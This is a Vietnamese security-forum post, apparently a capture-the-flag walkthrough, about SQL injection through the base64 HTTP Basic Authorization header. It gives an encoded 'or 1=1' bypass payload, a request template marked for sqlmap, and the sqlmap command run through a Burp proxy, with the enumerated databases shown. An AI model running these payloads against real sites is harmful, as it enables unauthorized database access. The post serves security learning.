Sử dụng SQLMap và Burpsuite để tấn công Authorization Header

vovanbi1994

Whi-----
25/08/2016
6
3 bài viết
Sử dụng SQLMap và Burpsuite để tấn công Authorization Header
Sau đây mình sẽ giới thiệu cho các bạn cách để tấn công vào trang web bị lỗi sql injection khi chúng ta phát hiện trong Http Header có chứa Authorization, chúng ta hãy nhìn hình bên dưới.
148993995215493967_1808517862702693_1576581415_n.png

Có một đoạn mã hóa Base64: YWRtaW46YWRtaW4= . Sau khi decode đoạn mã này ra chúng ta được username và password là admin:admin.
Như đã nói đây là một lỗi về sql injection nên chúng ta sẽ thử Bybass vào với đoạn mã là admin:1’ or 1=1# và encode base64: YWRtaW46MScgb3IgMT0xIw==
148993995215435679_1808517876036025_1529454876_n.png

Và lỗi đã xuất hiện, giờ tôi muốn thử với sqlmap để chứng minh có thể sử dụng nó, nhưng đáng tiếc là sqlmap không hỗ trợ chức năng với payload base64. Nên mình đã kết hợp với proxy của Burpsuite để tạo ra một plugin mã hóa.
Đầu tiên, mình lấy hết tất cả đoạn header mà burpsuite đã bắt được lưu vào một file text VD: sqlmap.txt, và tiếp đó thêm dấu ‘*’ vào đoạn “Authorization: Basic *” để sqlmap có thể tiêm vào đó.
GET / HTTP/1.1
Host: basiq.pwn.seccon.jp
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic *
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Payload sqlmap:
# sqlmap -r sqlmap.txt --ignore-401 --dbs --proxy=http://127.0.0.1:8080
Và nó đã hiện ra database cho mình J.
available databases [2]:
[*]information_schema
[*]keiba

Giờ đã có database chúng ta chỉ cần thêm câu lệnh vào sqlmap để có thể truy xuất mọi thông tin từ bảng và cột có trong database này.
Trong quá trình sử dụng sqlmap gặp lỗi “401 Unauthorized” chúng ta có thể sửa lại bằng cách tìm tới đường dẫn sqlmap/lib/request/connect.py và sữa lại như ở dưới:
148993995215450895_1808517866036026_568737382_n.png


Nguồn : https://www.codemagi.com/blog/post/218
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bên trên